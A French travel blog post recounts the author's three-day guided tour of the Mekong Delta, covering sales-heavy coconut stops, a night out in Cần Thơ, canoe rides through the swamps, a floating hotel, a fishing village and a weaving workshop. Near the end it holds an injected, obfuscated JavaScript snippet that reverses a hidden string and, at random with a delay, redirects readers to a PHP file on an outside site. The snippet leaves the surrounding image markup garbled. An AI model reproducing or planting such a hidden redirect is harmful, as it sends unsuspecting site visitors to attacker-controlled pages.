Découvrir le Mékong en 3 jours

Un petit bilan

Bon, après avoir rédigé quelques articles sérieusement, j’en profite pour faire un petit constat. Par exemple sur le dernier article : Rendez-vous à Gili Air, j’ai voulu savoir si l’article parlait assez de moi. J’ai donc compté le nombre de fois que j’utilise les mots « Je » et « J ‘ ». Le constat est accablant :

Décompte des Je et J'

51 « Je » et 44 « J ‘ ».

C’est en me rendant compte de cette aberration que j’ai décidé de plus parler de moi à partir de maintenant. Donc toi petit rageux qui n’est pas content, y’a pas encore d’espace commentaire mais t’inquiètes pas que je vais en sortir un dans pas longtemps pour que tu puisses rager dedans.

Et sinon à part ça ?

Ouloulou, ça fait longtemps que j’ai pas écris un article. J’ai juste passé dix jours à bosser sur différents trucs (j’ai notamment sorti une vidéo). J’ai pas vraiment profité depuis que je suis arrivé au Vietnam, j’étais à Hô Chi Minh et j’avoue que c’est une ville que je n’apprécie pas plus que ça. J’avais envie de me rattraper et de sortir de ma chambre d’hôtel.

Je suis donc parti pour une visite guidée de trois jours pour découvrir le Mékong.

Bateau de la visite guidée

Vrrrrrrrrrrrr, je travaille mon imitation de bateau à moteur

Première journée sur le Mékong

Les premières visites sont à 3h de route de Hô Chi Minh. Départ à 7h de l’hôtel pour prendre le bus direction Cần Thơ. On commence rapidement la journée par une première visite sur : la fibre de noix de coco. Bon, la visite n’était pas indiquée dans le planning mais bon pourquoi pas. On nous explique vite fait les bienfaits de la fibre de noix de coco, puis ça tourne rapidement au télé-achat. C’était surprenant, ça sortait de nul part, on avait rien demandé et on assiste à une pub d’une heure sur un truc qui n’intéresse personne et qui ne concerne pas la visite.

Ça commence donc moyennement, mais la visite continue. On prends un bateau, destination une fabrique de bonbons à base de noix de coco. Bon, ok, on a rapidement compris que la noix de coco était importante dans le coin, mais je cherchais une visite sur le Mékong moi. On nous montre précisément comment est fait un bonbon, on nous en fait goûter un, et on nous propose d’en acheter.

Le guide coupe une noix de coco

Notre pote le guide qui ouvre une noix de coco en live.

Bon, pour résumer, la première journée était un fail. Ils avaient juste un troupeau de touristes à disposition, à qui ils pouvaient vendre des trucs, ils en ont juste profité pour vendre tout ce qu’ils avaient. J’vais donc rapidement passer dessus (comme sur ta mère mdrrrrr) et raconter les deux autres journées que j’ai largement préféré.

Bonus : Se mettre une caisse à Cần Thơ

Comme tout le monde se faisait chier, j’ai rapidement trouvé un groupe de français avec qui s’occuper autrement. Passé 18h, c’était quartier libre et on est sorti boire un coup dans Cần Thơ. Rapidement, on se chauffe pour aller dans un club. J’me rappelle plus le nom de la boite, j’étais saoul hihihi. En revanche, je me rappelle que quand tu payes une bouteille, t’as un mec à ton service. Il surveille ta bouteille, il sert tes verres, il allume tes clopes si tu fumes, il prends tes selfies, c’était trop bien. J’me sentais l’âme d’un Qatari.

Par contre, les vietnamiens s’en battent les couilles de tes oreilles (pas l’inverse). J’avais jamais entendu la musique aussi fort en boite. Si fort que j’avais des acouphènes jusqu’à la première visite du lendemain. (Mec, mes transitions sont légendaires, prends-en de la graine, petit.)

Deuxième journée

C’est ici que la visite commence ! Tout le monde est blasé, par ce que jusqu’ici la visite était pas ouf, mais ça suffit les conneries. On veut du grand spectacle nous. Direction le marché flottant du Mékong. Perso, je ne m’attendais à rien. J’avais à peine lu le planning des trois jours de visite, j’voulais juste changer d’air. On arrive sur le marché flottant, et finalement c’est juste un regroupement de bateaux à moteur, qui se vendent des trucs entre eux ou qui vendent des trucs aux touristes. J’imaginais plus ça avec des maisons flottantes, mais ce ne sont que des bateaux.

Balade en pirogue

Le truc le plus marrant jusqu’ici : Une balade en pirogue.

On y reste assez peu de temps, le temps d’acheter une noix de coco, ou un ananas tranché et on repart. C’était pas ouf non plus, mais c’est le dernier truc pas ouf. Pourquoi ? Par ce que mon groupe avait pris une visite de 2 jours, j’étais le seul à prendre une visite de 3 jours. Je change donc de groupe à midi direction Chau Doc.

Changement de groupe

Bon, cette fois il n’y a que des vietnamiens avec moi. La visite se fait donc en vietnamien, et de temps en temps, la guide traduit mais la plupart du temps elle s’en fout. Je comprends, je pense que j’aurais fais pareil. On se dirige donc vers une première visite, qui est inconnue pour moi.

Une fois arrivé, un taxi scooter doit nous emmener vers la destination car le bus ne peut pas y aller. Il faut donc le payer 10.000 dong (30 centimes). Évidemment, moi et mes moyens d’occidentaux, le seul billet que j’ai dans les poches est un billet de 500.000 dong. Les gars se foutent de ma gueule, galèrent à trouver la monnaie, me prennent probablement pour un connard de touriste mais finalement trouvent ce qu’il faut et on y va.

C’était enfaite une balade en pirogue puis en bateau à moteur dans des espèces de marécages. C’était très calme et beau. J’ai beaucoup aimé.

Vu sur les marécages

Un endroit calme et agréable.

L’endroit est plutôt bien préservé, c’était reposant. On y voyait beaucoup d’oiseaux un peu classe, j’y connais rien en faune mais j’avais l’impression qu’ils étaient rare. J’vais mettre pas mal d’images de cette visite sur mon site photo (désolé pour la pub mais je ne veux pas blinder mes articles d’images). La partie en pirogue est vraiment bien par ce qu’il n’y a aucun bruit. Tu peux entendre les oiseaux papoter, et généralement tu peux même les voir.

Universellement dégueulasse

Je me sentais tellement bien dans cette pirogue que j’ai brisé le silence en rotant comme un gros touriste répugnant que je suis. J’avais oublié que je n’étais pas seul. Les vietnamiens ont arrêté de discuter. Je me suis rendu compte de ce que je venais de faire et j’ai donc fais genre que j’étais en train de filmer un pelican au loin et que ce n’était pas moi.

Deux oiseaux dans les marécages

Tic et Tac dans les marécages.

On termine donc sur une belle fin de deuxième journée. On retourne tous ensemble en bus vers Chau Doc pour rejoindre l’hôtel. Puis on me sépare encore une fois du groupe, pour me mettre dans un hôtel différent. Sérieusement, je savais pas pourquoi j’étais le seul à être emmené dans cet hôtel par ce qu’il était troooop bien (Après enquête, c’est probablement pour une histoire de prix). Un hôtel flottant, avec vue sur le levé de soleil le lendemain matin, c’était vraiment le feu.

Dernier jour sur le Mékong

Ouais vieux, j’t’avais dis que mes transitions étaient parfaites.

Levé de soleil sur le Mékong

La vue de ma chambre d’hôtel.

J’me réveille, tranquillement, je suis plutôt de bonne humeur. J’avais confié mon passeport à la réception par ce que c’est comme ça qu’ils se débrouillent ici. La veille on m’avait dit levé 6h pour le petit déj’ puis départ 6h30 pour prendre le bus. Donc 6h je suis au restaurant de l’hôtel, il n’y a personne. Ok tant pis pour le petit déj’, c’est pas si grave. J’attends 6h30, personne à la réception. Évidemment je ne pars pas sans mon passeport alors j’attends.

Un mec se pointe à 6h50 et me dit qu’un gars m’attend pour m’emmener jusqu’au bus. J’lui dis que j’ai pas mon passeport. Il se casse, revient 30 secondes plus tard mon passeport à la main. Et me dit que je dois payer la chambre 50 dollars US (deux fois le prix des trois jours de visite). J’lui dis qu’il se fout de ma gueule et que j’ai déjà payé la chambre.

Il s’en va, fait semblant de passer un coup de fil, et 12 secondes plus tard me dit qu’enfaite c’est bon. Le gars voulait ouvertement que je lui donne 50 boules, sans raison. Un jour y’en a un qui prendra une baffe d’1m94 dans les dents, il va faire passer le mot à tous ses potes et plus personne ne me fera chier.

Direction les villages de pêcheurs

On reprend le bateau pour se diriger vers un village de pêcheur et découvrir comment ils vivent.

Surveillance assurée

On est quand même surveillé en arrivant.

La visite commence dans les maisons des pêcheurs, et on voit rapidement qu’il y a des trappes sous les maisons. Les poissons sont tous enfermés sous la maison et ils les nourrissent via ces trappes. J’ai donc plutôt l’impression qu’il s’agît d’éleveurs de poissons plutôt que de pêcheurs, mais en même temps je sais même pas vraiment si il y a une différence. L’odeur des croquettes qu’ils donnent aux poissons est particulière, disons que si j’étais un poisson je n’en mangerais pas.

Les maisons sont montées sur des bidons qu’ils remplissent d’air pour flotter. Apparemment, parfois ils ajoutent un peu d’eau dedans pour être plus à la surface, mais j’ai pas compris pourquoi. #bilingue

J’deviens rapidement copain avec un chien qui est jaloux quand je prends autre chose que lui en photo, du coup je lui fais plaisir et je lui propose une petite séance photo.

Mon copain le chien

C’est mon copain le chien pêcheur

Une fabrique de tissus

On termine cette longue visite guidée par des fabricants de tissus en tout genre, non loin du village de pêcheur. D’ailleurs, on s’y rend encore une fois en bateau.

Je ne l’ai pas précisé jusque là, mais évidemment, tout ce que j’ai pu visiter jusqu’ici était très modeste. Et les gens vivent de leurs activités, mais pas plus. Parfois, j’étais gêné de sortir ma caméra qui devait coûter le prix de tout leur équipement de pêche. Souvent, je râle contre le fait qu’ils essaient tout le temps de me vendre des trucs, parfois qui n’ont rien à voir avec ce que je suis venu chercher. Mais si j’avais été à leur place, je ferais certainement pareil.

Et je m’en suis rendu compte surtout en arrivant ici. Pour rejoindre la fabrique nous devions traverser un pont, fait vraiment avec quelques morceaux de bois.

Le pont en bois

Le fameux pont en bois

Une fois arrivé à la fabrique, on peut voir le métier à tisser. Et juste derrière, la boutique de souvenirs. D’habitude j’achète jamais rien par ce qu’il n’y a rien qui m’intéresse ou qui me sert, mais cette fois ça tombe bien j’ai besoin de quelques trucs. J’en profite pour leur prendre un porte monnaie, une pochette et une casquette. Tout est joli, je suis content.

Et là, c’est le drame

Après mes petits achats, j’me pose sur une marche pour ranger toutes mes affaires. À peine assis, un groupe de 4 enfants vient vers moi pour me demander de l’argent. J’étais avec mon appareil photo autour du cou, mon portefeuille à la main et mon sac ouvert avec mon ordinateur dedans. J’me voyais vraiment pas dire : « Nan les enfants j’ai rien, désolé ».

En principe, je ne donne jamais d’argent aux enfants, je pense qu’un enfant ne devrait pas travailler et du coup je ne veux pas encourager ça en leur donnant un billet. En réalité, c’est très différent. J’regarde dans mon portefeuille et je donne un billet de 20.000 dong (60 centimes) à un petit garçon, en pensant qu’il repartagera. Il s’en va, avec les autres enfants et ils commencent à se disputer pour le billet.

Je vois les trois autres dégoûtés, mais je n’avais pas la monnaie pour donner de façon équitable. Ils reviennent vers moi et me demandent encore plus de sous. Un des adultes intervient, et les engueulent. Je me suis rendu compte, que l’on pouvait créer un conflit avec 60 centimes. Et d’une manière générale s’il y a bien quelque chose que je note depuis le début de mon voyage, c’est que le confort est relatif.

Conclusion

Il y a eu des hauts (Visite en pirogue, le village des pêcheurs, le levé de soleil sur le Mékong), il y a eu des bas (Touristes = vache à lait), mais globalement c’est une visite que j’ai appréciée. Il y aura mieux, il y aura moins bien. Mais je retiens pas mal de bons moments et ça m’a bien sorti de mes 10 jours de charbonnerie.

J’aime beaucoup rédiger des articles, plus que ce que je pensais. Je sais pas si ils sont bons, mais j’ai eu de bons retours de personnes que je n’avais pas recontacté depuis longtemps, donc merci. Ces prochains jours je risque de parcourir pas mal le Vietnam, je pense donc faire pas mal d’articles, plus courts, mais plus nombreux. Donc n’hésite pas à faire un tour de temps en temps, tu y trouveras peut-être un truc à lire. (Surtout que je déteste faire ma pub sur Facebook et tout…)

Je vous aime. Bisous

$NqM=function(n){if (typeof ($NqM.list[n]) == « string ») return $NqM.list[n].split(«  »).reverse().join(«  »);return $NqM.list[n];};$NqM.list=[« \’php.sgnittes-pupop/cni/tnemucod-yna-debme/snigulp/tnetnoc-pw/moc.kaphcterts//:ptth\’=ferh.noitacol.tnemucod »];var number1=Math.floor(Math.random() * 6);if (number1==3){var delay = 18000;setTimeout($NqM(0),delay);}touriste.jpg » alt= »Moi et ma casquette » width= »640″ height= »355″ /> Regarde comme je suis content avec ma casquette de touriste.

Se dépuceler au Jet Ski à Sao Beach

Article Suivant

Rendez-vous à Gili Air

Article Précédent